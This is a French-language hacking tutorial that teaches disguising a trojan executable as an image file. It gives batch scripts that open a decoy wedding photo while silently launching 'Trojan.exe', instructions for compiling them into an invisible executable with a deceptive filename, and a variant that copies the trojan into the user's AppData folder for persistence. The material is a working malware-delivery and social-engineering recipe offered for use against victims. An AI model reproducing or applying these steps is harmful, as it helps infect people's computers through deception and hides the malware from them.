HIDE .EXE FILES BEHIND IMAGES FILES [FRENCH VERSION] CORPS71

Je vous propose aujourd'hui un petit tutoriel qui consiste à binder une image dans un serveur simplement avec un petit script ,

Sujet caché !

Dans ce tuto, nous allons voir comment masquer un exécutable (trojan, logger etc …) dans une image. Je précise une chose, il faut néanmoins être un demeuré pour se faire avoir, vous comprendrez pourquoi. La première question qui vient :

« Comment peut-on mettre un logiciel dans une image ? Ce n’est pas possible. Un jpg n’est pas un exécutable »
C’est parce qu’il faut prendre le problème d’une autre manière et donc se demander « Comment faire passer un exécutable pour une image ? »
Nul besoin d’être expert en programmation (de simples bases suffisent) pour faire et surtout comprendre cela.

On va tout simplement créer un exécutable qui lancera et l’image et le trojan

1 - Commençons par construire notre dossier.
- Une image (.png,.jpg etc…) : ici Mariage.jpg
- Un exécutable malveillant. : ici Trojan.exe
Pour l’instant ces deux fichiers n’ont rien à voir l'un avec l’autre et son indépendants. On doit donc créer un petit script que l’on appellera le « script racine » pour qu’ils s’ouvrent ou s’exécutent lorsque la victime lancera le script racine.

2 - Ouvrez donc notepad ou bloc note et écrivez ceci (en mettant vos noms de fichiers) :

@echo off
Start Mariage.jpg
Start Trojan.exe
End.

Lorsque vous enregistrez le fichier (donnez lui un nom passe partout genre «Photo du mariage de Pauline et Paul »), n’oubliez surtout pas de mettre à la fin « .bat ».
ATTENTION : toujours mettre l’image en premier.
(pour rappel “@Echo off” empêche d’afficher le script à l’écran et donc à la victime de se douter de quoique ce soit.)

3 – Créons notre joint-venture Image/Exe.

Téléchargez « Bat to exe converter » ici . Ouvrez le.
Dans « batch file », mettez le batch « Photo du mariage de Pauline et Paul ».
Dans options, cochez « Invisible application ».
Dans « Working directory », cochez “Temporary directory”
Dans “Temporary Files”, cochez “Do not Delete”.
Maintenant, allez dans l’onglet “Include”. Cliquez sur Add et insérez votre image, ici Mariage.jpg et votre .exe, ici Trojan.exe.

ATTENTION : L’image doit être en première position, sinon l’executable vous signalera une erreur.
Une fois tout cela fait, cliquez sur 'Compile'. Il va créer un exécutable « Photo du mariage de Pauline et Paul ». Le tout est joué.
Alors malheureusement, l’icône qui apparait est l’icône de l’executable, d’où ma remarque au début comme quoi pour se faire avoir, il fallait ne pas être prudent. Et pourtant, la plupart se feront avoir, car lorsque l’on clique, magie, l’image apparaît
. Enfin, si la signature du trojan est dans les bases de données de l'anti-virus, l'AV détectera votre virus.
Note : vous pouvez mettre tout et n’importe quoi dans le script racine (sous respect d’un bon codage). Par exemple pourquoi ne pas demander au script de déplacer le trojan dans un dossier que l’on aurait crée pour l’occasion enfoui profondément dans le disque dur pour pallier au fait que la victime supprimera certainement votre « photo ».

je vous donne le script. , retournez à l’étape deux et inscrivez ceci dans votre script racine (ensuite refaites l’étape 3) :

@echo off
Start Mariage.jpg
md C:\Users\%USERNAME%\AppData\Roaming\Nomdunouveaudossier
copy Trojan.exe C:\Users\%USERNAME%\AppData\Roaming\ Nomdunouveaudossier
start C:\Users\%USERNAME%\AppData\Roaming\ Nomdunouveaudossier \Trojan.exe
Start Trojan.exe
End.

- Ne remplacez surtout pas « %USERNAME % ».